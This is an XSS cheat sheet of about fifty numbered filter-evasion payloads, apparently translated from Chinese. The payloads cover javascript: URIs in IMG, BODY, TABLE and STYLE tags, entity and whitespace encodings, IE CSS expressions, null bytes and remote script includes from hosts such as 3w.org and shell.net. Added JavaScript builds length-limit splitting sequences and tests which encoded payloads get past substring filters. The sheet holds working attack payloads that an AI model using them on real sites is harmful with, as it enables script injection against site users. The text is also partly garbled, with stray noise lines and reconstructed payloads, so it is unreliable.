(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups (event handlers on made-up tags; a slash can stand in for the space before the attribute, and backticks replace the parentheses)
<q/oncut=alert()>
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using the javascript: directive (this copy repeated the SCRIPT payload from (1) here; the IMG payload is reconstructed from the heading and from (3))
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities for the quotes (the semicolons are required here; this copy had already decoded the entities)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (use an encoder/calculator to produce the codes)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Decimal character references with semicolons (use an encoder/calculator)
<IMG SRC=jav...omitted...S')>

(9) Long, zero-padded (7-digit) decimal character references, no semicolons needed (use an encoder/calculator)
<IMG SRC=jav...omitted...S')>

(10) Hex character references, also without semicolons (use an encoder/calculator; the value was stripped from this copy and is reconstructed as the hex encoding of javascript:alert('XSS'))
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab splitting the directive (a literal TAB between "jav" and "ascript"; the "jav" prefix and separator were stripped from this copy in (11) through (14) and are reconstructed)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript, one character per line: an extreme case (the value was stripped from this copy and is reconstructed as the same payload with a line break after every character)
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

(16) Beating an input length limit (all fragments must land on the same page; each block appends a piece to z, and the last block runs the assembled string; note the closing tag is split across "</sc" and "ript>" so no fragment ends the wrapper early)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
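The trick in (16) generalises: any payload can be cut into fragments that each fit the field's limit, as long as no fragment carries an unescaped quote and none contains the text "</script", which would end the wrapper block early. The JavaScript below is an added example, not code from the original sheet: it generates the block sequence for a chosen limit and replays it by plain string concatenation instead of calling eval, so the result can be checked offline. The 32-character limit and the payload string are assumptions for the demonstration.

```javascript
// Added example (not from the original sheet): build and replay the
// split-<script> trick from item (16) for an arbitrary payload and limit.

const OPEN_FIRST = "<script>z='";     // first block assigns z
const OPEN_NEXT  = "<script>z=z+'";   // later blocks append to z
const CLOSE      = "'</script>";

// Escape a fragment so it is safe inside a single-quoted JS string literal.
function escapeFragment(frag) {
  return frag.replace(/\\/g, '\\\\').replace(/'/g, "\\'");
}

// Cut `payload` into <script> blocks of at most `limit` characters.  A slice
// is shortened while its escaped form does not fit or while it contains
// "</script" (which would close the wrapper tag early).  The final block
// evaluates the assembled string, exactly as the sheet's last line does.
function splitPayload(payload, limit) {
  const blocks = [];
  let rest = payload;
  let first = true;
  while (rest.length > 0) {
    const open = first ? OPEN_FIRST : OPEN_NEXT;
    const room = limit - open.length - CLOSE.length;
    if (room < 2) throw new Error('limit too small for the wrapper');
    let n = Math.min(room, rest.length);
    while (n > 1 && (escapeFragment(rest.slice(0, n)).length > room ||
                     /<\/script/i.test(rest.slice(0, n)))) {
      n--;
    }
    blocks.push(open + escapeFragment(rest.slice(0, n)) + CLOSE);
    rest = rest.slice(n);
    first = false;
  }
  blocks.push('<script>eval(z)</script>');
  return blocks;
}

// Replay the blocks in page order without calling eval: pull the literal out
// of each assignment block and concatenate, undoing escapeFragment.
function reassemble(blocks) {
  let z = '';
  for (const b of blocks) {
    const m = /^<script>z=(?:z\+)?'((?:\\.|[^'\\])*)'<\/script>$/.exec(b);
    if (m) z += m[1].replace(/\\(.)/g, '$1');
  }
  return z;
}

// Constructed payload: the same remote include the sheet assembles in (16).
const PAYLOAD = 'document.write("<script src=http://www.shell.net/1.js></script>")';

// Returns true when the generated blocks all fit the limit, none of them
// closes early, and replaying them reproduces the payload exactly.
function verify(payload, limit) {
  const blocks = splitPayload(payload, limit);
  const fit = blocks.every(b => b.length <= limit);
  const noEarlyClose = blocks.every(
    b => b.toLowerCase().indexOf('</script') === b.length - '</script>'.length);
  return fit && noEarlyClose && reassemble(blocks) === payload;
}
```

Run `verify(PAYLOAD, 32)` to confirm the sequence round-trips; lowering the limit below the wrapper overhead (21 characters for the first block, 23 for the rest) is reported as an error rather than producing a truncated block.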

(17) Null byte inside the scheme (the raw byte must be injected directly, hence writing it to a file)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2. Null-byte tricks are almost never useful against domestic sites: they relied on old browser parsers ignoring the byte, so there is rarely anywhere left to use them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: directive in an IMG (the &#14; was stripped from this copy and is reconstructed)
<IMG SRC=" &#14;  javascript:alert('XSS');">
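The IMG variants in (3) through (19), and the url(&#1;...) form in (47), all work because the browser normalises an attribute value before it looks at the scheme: character references are decoded (with or without a semicolon, with any zero padding), leading and trailing control characters and spaces are dropped, and tab, newline and carriage return are removed wherever they occur. The following JavaScript is an added example, not part of the original sheet: it performs those steps and then checks the scheme, so a filter that only looks for the literal substring "javascript:" can be measured against it. The sample values are constructed from the payloads above; the legacyNul option models the old-IE null-byte handling from (17) and (18), which current browsers do not share.

```javascript
// Added example (not from the original sheet): normalise an attribute value
// the way a browser does before scheme detection, then flag script schemes.

const NAMED_REFS = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'" };

// Decode numeric character references (decimal or hex, zero padding allowed,
// trailing semicolon optional as in (9) and (10)) and a few named ones.
function decodeEntities(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (whole, body) => {
    if (body[0] !== '#') return body in NAMED_REFS ? NAMED_REFS[body] : whole;
    const cp = /^#[xX]/.test(body) ? parseInt(body.slice(2), 16)
                                   : parseInt(body.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
  });
}

// URL pre-processing: strip leading/trailing C0 controls and spaces, then
// remove every tab, LF and CR.  Old IE additionally ignored embedded NUL
// bytes (items 17 and 18); that is the legacyNul option, off by default.
function normaliseUrl(value, opts = {}) {
  let v = decodeEntities(value);
  if (opts.legacyNul) v = v.replace(/\u0000/g, '');
  v = v.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  return v.replace(/[\t\n\r]/g, '');
}

// True when the normalised value resolves to a javascript: or vbscript: URL.
function isScriptUrl(value, opts) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(normaliseUrl(value, opts));
  return m !== null && ['javascript', 'vbscript'].includes(m[1].toLowerCase());
}

// Constructed sample attribute values taken from the payloads on this sheet.
const SAMPLES = [
  "javascript:alert('XSS')",                                                  // (3)
  "JaVaScRiPt:alert('XSS')",                                                  // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (8)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29", // (10)
  "jav\tascript:alert('XSS');",                                               // (11)
  "jav&#x09;ascript:alert('XSS');",                                           // (12)
  "jav&#x0A;ascript:alert('XSS');",                                           // (13)
  "jav&#x0D;ascript:alert('XSS');",                                           // (14)
  " &#14;  javascript:alert('XSS');",                                         // (19)
  "&#1;javascript:alert('XSS')",                                              // (47)
  'vbscript:msgbox("XSS")',                                                   // (40)
];

// The samples a substring filter for "javascript:"/"vbscript:" would let
// through even though the browser treats them as script URLs.
function missedByNaiveFilter(samples) {
  return samples.filter(v => !/javascript:|vbscript:/i.test(v) && isScriptUrl(v));
}
```

Six of the eleven samples pass a case-insensitive substring filter and are still executed by the browser. The same normalisation is what makes the null-byte forms a browser-version question rather than a filter question: with legacyNul off, "java\0script:" does not parse as a scheme at all.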
/ m2 C2 C% K) j8 ^$ B# ?9 |* U(20)Non-alpha-non-digit XSS: s ?& ]! X* Y" X# D
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>+ d# @# K; \: W3 r
- {& C0 M g# E( e8 l0 K" z# G. q
(21)Non-alpha-non-digit XSS to 2
$ \) b1 d) T% D* g! R<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ E( z* t# J- R( S, {. w
4 B8 w2 i* Z0 V
(22)Non-alpha-non-digit XSS to 3
/ t$ d ]0 k2 N6 K* R- I0 M<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
9 ]/ ]2 Q3 b/ v @2 r/ n8 X9 p! x5 y7 [; f* G" J0 g9 T* _
(23)双开括号
) U9 S3 t; `/ K3 F<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 e& X" o5 p8 T z8 q4 {% J1 @6 R; o2 m1 O' w
(24)无结束脚本标记(仅火狐等浏览器)5 t6 @* T" D% [$ l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 e9 Q4 [' I1 y+ O) }$ l0 k O2 f$ z! ^
% P( D& d/ V9 p* N5 g- j; j& w4 I(25)无结束脚本标记2
2 c7 ~0 c! g9 _* e* J<SCRIPT SRC=//3w.org/XSS/xss.js>) h, I! y* H$ J3 h* V$ j5 M3 E
; T1 H% }2 t5 Y$ W$ Q1 X9 c
(26)半开的HTML/JavaScript XSS
% L P, `$ m3 S( ?5 S<IMG SRC=\'#\'" /span>
! G0 X7 s( c: n
+ q8 L. i5 q- \1 B9 H8 X5 @: ?(27)双开角括号. {5 I% g0 j; Z3 a" ? \( N6 n
<iframe src=http://3w.org/XSS.html <2 I# i# T- `' C
. y7 l+ f; A6 a0 ?' f3 G
(28) No single quotes, double quotes or semicolons (a regex literal supplies the string)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping an escaped JavaScript string: when the filter only backslash-escapes quotes, a leading backslash consumes the escape and the quote closes the string
\";alert('XSS');//
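Item (29) targets a template that drops user input into a JavaScript string literal and defends it by escaping only the double quote. The JavaScript below is an added example, not code from the original sheet: it renders such a template with the sheet's payload (alert replaced by a return so the effect is observable) under the broken escape and under a correct one, and runs the result in an isolated function so no browser is needed. The template string and both escape functions are assumptions for the demonstration.

```javascript
// Added example (not from the original sheet): why \";alert('XSS');// beats a
// filter that only escapes double quotes, and what a correct escape looks like.

// Broken: the quote is escaped, but a backslash in the input is not, so the
// input's own backslash swallows the inserted one.
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Correct: emit a JSON string literal body (escapes both \ and "), and turn
// "<" into \u003c so the literal can never contain "</script>".
function safeEscape(s) {
  return JSON.stringify(s).slice(1, -1).replace(/</g, '\\u003c');
}

// Build the script a server-side template would emit and run it in its own
// function scope.  The script stores the value and returns it; if the input
// breaks out of the literal, the returned value changes.
function renderAndRun(userInput, escape) {
  const script = 'var name = "' + escape(userInput) + '"; return name;';
  return new Function(script)();
}

// The sheet's payload with a return in place of alert: \";return 'injected';//
const ATTACK = String.raw`\";return 'injected';//`;

// Returns true when the escape function keeps every input inside the literal.
function escapeIsSafe(escape) {
  const inputs = [ATTACK, 'say "hi"', '</script><b>', 'back\\slash'];
  return inputs.every(v => renderAndRun(v, escape) === v);
}
```

With naiveEscape the generated source is `var name = "\\";return 'injected';//"; return name;`: the literal ends after the doubled backslash and the rest of the payload runs as code. With safeEscape the same input comes back unchanged.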

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image (the value was stripped from this copy and is reconstructed)
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (the onload handler was stripped from this copy and is reconstructed)
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC (value reconstructed; stripped from this copy)
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC (value reconstructed; stripped from this copy)
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND (value reconstructed; stripped from this copy)
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet link
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) VBScript in an IMG (value reconstructed; this copy had it fused with the previous item)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME (value reconstructed; stripped from this copy)
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME (value reconstructed; stripped from this copy)
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character after the open parenthesis: the browser ignores any of decimal 1-32, 34, 39, 160, 8192-8213, 12288 or 65279 there (the &#1; was stripped from this copy and is reconstructed)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression (IE only; this copy rendered expression( as expression_r)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with an expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (any made-up tag works: an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE tag with background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with an expression broken up by CSS comments (only the tail survived in this copy; the first line is reconstructed from the well-known form of this vector)
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

(53) STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that carries the XSS (the quoted URL was stripped from this copy and is reconstructed)
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>